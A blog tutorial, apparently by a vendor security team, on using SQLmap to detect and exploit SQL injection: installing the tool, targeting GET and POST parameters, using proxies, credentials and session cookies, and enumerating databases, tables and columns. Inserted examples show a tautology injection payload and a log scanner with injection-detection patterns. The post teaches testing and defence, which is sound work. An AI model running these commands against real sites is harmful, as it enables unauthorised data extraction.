Owning SQLi vulnerability with SQLmap

By CaroleLoomis, Contributor

SQLi (or SQL injection) is considered one of the most critical vulnerabilities in web application security. The attack works by inserting or injecting SQL statements through input fields or parameters supplied by the end user. A successful execution might let the attacker:

  • Bypass security controls, such as a login page.
  • Expose sensitive information, which we refer to as a “data breach.”
  • Manipulate data (add, edit, delete), data structures, database schemas, procedures and scripts, depending on the severity of the vulnerability.

In some situations it can lead to taking over the whole server by means of code execution and privilege escalation. Finding a SQLi-vulnerable site or application is the first step, but exploiting it and digging further is another thing. This blog aims to give you the nuts and bolts of using SQLmap, so you can learn basic techniques to properly evaluate SQL injections and understand some attack methods.
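The injection described above, as an added example that is not from the original post: the article’s three product.php parameters (ID, category, section) are looked up against a constructed SQLite table, first by pasting the values into the SQL text and then with a parameterised query. The table, its rows, the tampered section value and the function names are all constructed for this demo.

```python
# Added example (not from the original post): the article's product.php
# parameters (ID, category, section) looked up against a constructed SQLite
# table, once by string formatting and once with a parameterised query.
import sqlite3


def make_db():
    """Constructed sample table; not real product data."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products (ID INTEGER, category INTEGER, section INTEGER, name TEXT)")
    con.executemany("INSERT INTO products VALUES (?, ?, ?, ?)",
                    [(321, 20, 10, "widget"), (322, 20, 11, "gadget"), (500, 30, 10, "gizmo")])
    return con


def lookup_vulnerable(con, params):
    """Query-string values pasted into the SQL text: a quote in a value rewrites the statement."""
    sql = ("SELECT name FROM products WHERE ID = '%s' AND category = '%s' AND section = '%s'"
           % (params["ID"], params["category"], params["section"]))
    return [row[0] for row in con.execute(sql)]


def lookup_safe(con, params):
    """Same lookup with placeholders: the driver binds the values as data, never as SQL."""
    sql = "SELECT name FROM products WHERE ID = ? AND category = ? AND section = ?"
    args = (params["ID"], params["category"], params["section"])
    return [row[0] for row in con.execute(sql, args)]


if __name__ == "__main__":
    con = make_db()
    normal = {"ID": "321", "category": "20", "section": "10"}
    # A tautology in the last parameter turns the WHERE clause into "... OR '1'='1'".
    tampered = {"ID": "321", "category": "20", "section": "10' OR '1'='1"}
    print(lookup_vulnerable(con, normal), lookup_safe(con, normal))      # ['widget'] ['widget']
    print(lookup_vulnerable(con, tampered), lookup_safe(con, tampered))  # ['widget', 'gadget', 'gizmo'] []
```

The parameterised version returns nothing for the tampered value because the bound string simply does not equal any section number; the statement itself is unchanged.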

 

So let’s get started! We will be using SQLmap on Ubuntu Linux. If you want to use a pentest distro that already ships SQLmap, that is fine, but for beginners who are new to Linux, or folks who have just started learning penetration testing, it is a good foundation to install it yourself. SQLmap runs on Python, so it is not OS dependent.

Open the terminal and follow these simple steps:

1. Download

wget 'https://github.com/sqlmapproject/sqlmap/tarball/master' --output-document=sqlmap.tar.gz

2. Extract

tar -xvf sqlmap.tar.gz && mv sqlmapproject* sqlmap && cd sqlmap && ls

3. Run a version check

python sqlmap.py --version

Now we will proceed to the next phase.

If you want to view the available commands and options, run python sqlmap.py -h (basic options) or python sqlmap.py -hh (advanced options).

A quick note: sometimes it can be overwhelming and a little confusing to see dozens of options or commands, especially when you’re trying to run a tool for the first time. Knowing the basics may not be enough to learn the whole shebang, but it will definitely help you get started.

 

Quick jump! There are two main methods of sending parameters or data from the client to the server: the GET and the POST request. Both carry parameters with corresponding values, and both are areas that can be vulnerable to SQL injection.

GET request

In an HTTP GET request, parameters are sent in query-string format.

The structure looks like this:

?ID=123

ID  <-- the URL parameter
123 <-- the value of the parameter

 

Sometimes there are 2 or more parameters:

Parameter   Value
ID          321
category    20
section     10

Example: python sqlmap.py -u "http://sqlivulnerable.com/product.php?ID=321&category=20&section=10"
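From the defensive side of the same GET request, an added example that is not part of the original post: a small Python scanner that parses access-log lines in the common "combined" format and flags query-string parameters whose decoded values contain SQL injection indicators. The log lines, IP addresses and user-agent strings are constructed samples, and LOG_RE, SQLI_RE, check_query and scan_log are names chosen for this example.

```python
# Added example (not part of the original post): scan constructed access-log
# lines for GET query-string parameters that carry SQL injection payloads.
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')

# Tampering indicators in a decoded parameter value: a quote followed by a boolean
# operator, UNION ... SELECT, comment terminators, stacked statements, time delays.
SQLI_RE = re.compile(
    r"""['"]\s*(or|and)\b|\bunion\b.*\bselect\b|--\s*$|/\*|;\s*(drop|exec|waitfor)\b|\bsleep\s*\(""",
    re.IGNORECASE)


def check_query(target):
    """Return [(param, decoded value)] for parameters that look injected."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = unquote_plus(value)  # second pass catches double-encoded payloads
        if SQLI_RE.search(value):
            hits.append((name, value))
    return hits


def scan_log(lines):
    """Return [(client ip, path, flagged params, user-agent)] for suspicious GET requests."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m.group("method") != "GET":
            continue
        hits = check_query(m.group("target"))
        if hits:
            findings.append((m.group("ip"), urlsplit(m.group("target")).path, hits, m.group("ua")))
    return findings


# Constructed sample lines (RFC 5737 documentation addresses), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /product.php?ID=321&category=20&section=10 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /product.php?ID=321%27%20AND%201%3D1--&category=20&section=10 HTTP/1.1" 200 512 "-" "sqlmap/1.7 (https://sqlmap.org)"',
    '198.51.100.9 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?id=1%20UNION%20SELECT%20null,@@version HTTP/1.1" 500 231 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Only GET requests are visible this way; POST bodies are not written to a standard access log, so detecting injection in form fields needs the application or a WAF to log the decoded parameters.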

 

POST request

In a POST request the input fields (form objects/fields) are sent in the request body. The usual content type is application/x-www-form-urlencoded.

Example: python sqlmap.py -u http://sqlivulnerable.com/search.asp --forms

Note:
You can specify the data to be posted with the following option:

--data="category=1&section=2&search=aloha+milkyway"

If no data is specified, SQLmap will ask whether to fill the parameter values with randomly generated data.

 

We now have two basic examples of running SQLmap against GET and POST requests, but there are other things we may encounter in some circumstances.

Proxy

If we are behind a firewall and a proxy is needed to reach the site/URL/machine, we need to specify it with --proxy; http, https, socks4 and socks5 proxies are supported.

Examples:

Using a SOCKS5 proxy

sqlmap.py -u "https://www.sqlivulnerable.com/index.php?id=1" --proxy="socks5://mysuperproxy:8080"

Using a SOCKS4 proxy

sqlmap.py -u "https://www.sqlivulnerable.com/index.php?id=1" --proxy="socks4://5.11.7.31:8080"

Using an HTTP proxy

sqlmap.py -u "https://www.sqlivulnerable.com/index.php?id=1" --proxy="http://11.12.13.14:3128"

Authentication

Some websites require authentication such as Basic, Digest or NTLM. For this you can use --auth-type=BASIC --auth-cred="username:password".

Example:

sqlmap.py -u "https://www.sqlivulnerable.com/index.php?id=1" --proxy="http://11.12.13.14:3128" --auth-type=BASIC --auth-cred="superuser:awesomepass123"

Valid session or valid login

In some cases the target can only be injected and exploited with valid credentials, or once an authenticated session is established. If we encounter this scenario, we can pass the session cookie with --cookie.

Example:

sqlmap.py -u "https://www.sqlivulnerable.com/index.php?id=1" --cookie="ASPSESSIONIDASRQASRD=MNLBEJLCPMEGCAMDAMPJAONP"

DBMS type

Below is an example of a SQL error that discloses the database type.

[Screenshot in the original post: a SQL error message revealing the backend database type]

Remember that SQLmap uses payloads specifically designed or crafted for each DBMS type, so knowing the type of database backend before running the attack saves a tremendous amount of time! We can specify the type with --dbms.

Example:

sqlmap.py -u "https://www.sqlivulnerable.com/index.php?id=1" --cookie="ASPSESSIONIDASRQASRD=MNLBEJLCPMEGCAMDAMPJAONP" --dbms="Microsoft SQL Server"

Below is an example of successfully finding a valid injection point. Once we have this, we can go ahead and proceed with enumeration.

[Screenshot in the original post: SQLmap output for the injection point]

If we want to enumerate all the databases, we can use --dbs.

[Screenshot in the original post: SQLmap output for the --dbs run]

We did not successfully list the entire database.

Let’s dig a little deeper by enumerating the tables of a specific database: we use -D to specify the database we want and the --tables option to list all of its tables.

Example: python sqlmap.py --url=http://sqlivulnerable.com --cookie="ASPSESSIONIDASRQASRD=MNLBEJLCPMEGCAMDAMPJAONP" -D transactions --tables

Let’s now enumerate the columns of a specific table by specifying the table with -T and adding --columns.

Example: python sqlmap.py --url=http://sqlivulnerable.com --cookie="ASPSESSIONIDASRQASRD=MNLBEJLCPMEGCAMDAMPJAONP" -D transactions -T sample_tran_table --columns

 

Let’s run a select statement with --sql-query:

python sqlmap.py --url=http://sqlivulnerable.com --cookie="ASPSESSIONIDASRQASRD=MNLBEJLCPMEGCAMDAMPJAONP" --sql-query="select * from transactions.sample_tran_table"

We can also search for database, table or column names by combining -D | -T | -C with the --search option.

Example:

python sqlmap.py --url=http://sqlivulnerable.com --cookie="ASPSESSIONIDASRQASRD=MNLBEJLCPMEGCAMDAMPJAONP" -C ID --search

That’s all for now. Hope you enjoyed this and learned something!

 

Posted on behalf of Medz Barao, Fortify on Demand Security Team.

About the Author

CaroleLoomis

Comments

Great post! Be nice if it was chapter one...

hehe